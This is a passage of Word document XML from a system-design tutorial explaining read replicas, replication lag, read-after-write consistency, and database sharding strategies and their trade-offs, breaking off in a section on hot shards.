    <w:p w14:paraId="6CF739D5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A single primary handles ALL writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6372A4A0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The primary streams its WAL (Write-Ahead Log) to N read replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40227EE4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Replicas apply the WAL entries to their local copy of the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066AD8D5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Read traffic is distributed across replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0D1B5A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scaling characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDF1979" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Linear read scalability: 5 replicas → ~5x read throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E0FF43" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Write throughput unchanged (still limited to the primary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAD920B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Each replica consumes network bandwidth for replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C88EA1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The replication lag problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E14A035" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Replicas are always slightly behind the primary (typically milliseconds to seconds):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78531CC4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>User writes a comment (goes to primary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278393CD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>User immediately refreshes the page (read goes to a replica).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC9D80A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The replica hasn't received the write yet → user doesn't see their own comment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371FD28" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions to read-after-write consistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0709B563" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read your own writes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> After a write, route that user's reads to the primary for a short window (e.g., 5 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A803FE1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Causal consistency tokens:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> The write returns a logical timestamp. Subsequent reads include this timestamp. The replica waits until it's caught up to that timestamp before responding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451F54F5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Monotonic reads:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Pin a user's reads to a specific replica for a session, ensuring they never go "back in time."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0B1A03" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Sharding (Horizontal Partitioning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF1CB37" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Your single database machine can't hold all the data in RAM, or write throughput exceeds what one machine can handle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590DECEC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What sharding does:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064701F7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Splits the data across multiple database instances, each holding a subset of rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D23073E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shard key selection — the most critical decision:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D9BD4C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The shard key determines which data lives on which shard. This decision is nearly impossible to change later without massive data migration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033FFC7B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example — sharding a social media platform by user_id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C5B581" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>User 1–1M → Shard A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D0DFE5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>User 1M–2M → Shard B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2A305A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>User 2M–3M → Shard C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708DD691" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How a query routes to the correct shard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6D6BC5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Application receives request for user_id=1,500,000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCC180A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Routing layer (application code, proxy, or middleware) computes: shard = hash(user_id) % num_shards or performs a range lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC32FAC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Query is sent to the correct shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07088C84" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Result returns to application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E034BD0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sharding strategies in depth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F805CAE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Range-based sharding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A704B43" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Shard 1: user_id 1–1,000,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51043131" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Shard 2: user_id 1,000,001–2,000,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DFF533" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Pros: Range queries within a shard are efficient. Easy to understand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CE7B8C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Cons: Hot spots — new users all go to the latest shard. Celebrity accounts create uneven load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3666716B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hash-based sharding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1319DB42" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>shard = hash(user_id) % N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FD2E18" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Pros: Even distribution (assuming a good hash function). No hot spots from sequential IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE349F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Cons: Range queries now span ALL shards (must scatter-gather). Adding a shard rebalances ~1/N of ALL data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9592CE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Directory-based sharding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782D908B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A lookup table maps each key to its shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070F2F0B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Pros: Flexible. Can move individual keys between shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8C66ED" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Cons: The directory is a SPOF and bottleneck. Every query must first check the directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61557933" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problems sharding introduces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271770F8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-shard queries (the scatter-gather problem):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4955B2F5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>"Find all orders in the last 24 hours" — if orders are sharded by user_id, this query must go to EVERY shard, results must be merged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BF4B2D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Behind the scenes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B3E5F4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Router sends query to all N shards in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108964A3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Each shard executes locally, returns results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E66E07" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Router merges/sorts results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0017B2FD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Latency = slowest shard's response time (tail latency problem).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283A44BB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-shard joins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6B7E39" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Tables on different shards cannot be JOINed by the database engine. You must:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD64272" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Denormalize (duplicate data across shards).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C00547" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Perform application-level joins (query both shards, merge in application).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9743EB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Colocate related data on the same shard (shard users and their orders together by user_id).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35156105" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-shard transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1037BDB5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>A transaction that modifies data on two different shards requires distributed transactions (2PC — Two-Phase Commit), which is slow, complex, and hurts availability (if one shard is down, the transaction blocks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457587C5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rebalancing (resharding):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E66130" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>When you need to add shards (because existing ones are full):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492B595C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>With hash mod N: changing N moves nearly all keys. Catastrophic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0FFFFB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>With consistent hashing: only ~1/N of keys move. Much better.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC06B1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>With virtual nodes: even smoother rebalancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF98B37" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>During rebalancing, the system must:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025EB1CC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Copy data to new shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D7997B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Handle reads/writes to data that's in transit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B27CA45" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Ensure no data loss or duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00878796" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>This can take hours to days for large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A693778" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hot shards (data skew):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6181D65A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Even with hashing, real-world data isn't uniform:</w:t>
      </w:r>
    </w:p>
